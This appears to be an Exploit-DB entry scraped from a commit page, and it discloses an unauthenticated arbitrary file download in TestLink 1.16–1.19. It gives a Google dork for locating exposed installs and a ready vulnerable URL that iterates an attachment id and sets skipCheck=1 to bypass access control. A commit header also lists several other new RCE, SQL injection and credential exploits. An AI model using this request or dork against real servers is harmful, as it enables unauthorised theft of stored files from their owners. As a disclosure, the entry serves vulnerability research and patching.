c906261f2c
11 changes to exploits/shellcodes MTPutty 1.0.1.21 - SSH Password Disclosure Raspberry Pi 5.10 - Default Credentials Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated) LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) TestLink 1.19 - Arbitrary File Download (Unauthenticated) Student Management System 1.0 - SQLi Authentication Bypass Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
15 lines
No EOL
718 B
Text
15 lines
No EOL
718 B
Text
# Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated)
|
|
# Google Dork: inurl:/testlink/
|
|
# Date: 07/12/2021
|
|
# Exploit Author: Gonzalo Villegas (Cl34r)
|
|
# Exploit Author Homepage: https://nch.ninja
|
|
# Vendor Homepage: https://testlink.org/
|
|
# Version:1.16 <= 1.19
|
|
# CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
You can download files from "/lib/attachments/attachmentdownload.php", passing directly in URL the id of file listed on database, otherwise you can iterate the id parameter (from 1)
|
|
|
|
Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1"
|
|
|
|
for research notes:
|
|
https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/ |